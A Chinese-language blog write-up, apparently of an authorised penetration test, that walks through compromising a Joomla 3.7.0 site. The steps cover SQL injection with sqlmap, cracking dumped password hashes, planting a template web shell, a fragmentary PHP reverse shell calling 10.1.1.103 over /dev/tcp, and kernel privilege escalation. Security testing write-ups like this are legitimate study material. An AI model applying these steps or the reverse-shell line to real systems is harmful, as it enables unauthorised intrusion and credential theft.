記一次對 Joomla CMS 滲透過程

​最近在一次對某外企進行滲透測試的過程中(已授權)成功突破內網,發現了一個Joomla CMS,想著把這個滲透過程和思路寫下來,供大家參考,請大佬略過。。。


首先,對其進行掃描

記一次對 Joomla CMS 滲透過程

發現其版本為 Joomla 3.7.0

於是,搜索這個版本的漏洞,,,

記一次對 Joomla CMS 滲透過程

發現存在SQL注入漏洞,繼續查看詳情

記一次對 Joomla CMS 滲透過程

上sqlmap跑一波,成功爆庫。。。

記一次對 Joomla CMS 滲透過程

接下來,爆表

記一次對 Joomla CMS 滲透過程

爆用戶名密碼

記一次對 Joomla CMS 滲透過程

在線跑了一下MD5,實在是跑不出來,接下來試試John破解

記一次對 Joomla CMS 滲透過程

成功破解,得到密碼,登錄後臺,進入模板寫入一句話,訪問:

http://10.1.1.104/templates/protostar/shell.php

沒有問題,菜刀連接

記一次對 Joomla CMS 滲透過程

查看權限,發現不是root

記一次對 Joomla CMS 滲透過程

接下來進行提權,首先我們查看系統版本,發現是Linux 4.4.0,查找一個這個版本的漏洞試了好幾個都不行,發現這個可以

記一次對 Joomla CMS 滲透過程

好,我們上傳exp

記一次對 Joomla CMS 滲透過程

提權、、、、菜刀不好用,寫一個反彈PHP文件,反彈回來一個shell

記一次對 Joomla CMS 滲透過程

<code>& /dev/tcp/10.1.1.103/7777 0>&1'");?>/<code>


本地監聽7777 然後訪問:

http://10.1.1.104/templates/protostar/cmd.php

成功反彈shell

記一次對 Joomla CMS 滲透過程

接著繼續提權、、、運行如下兩個文件

<code>./compile.sh./doubleput/<code>
記一次對 Joomla CMS 滲透過程

OK,提權成功。。。


分享到:


相關文章: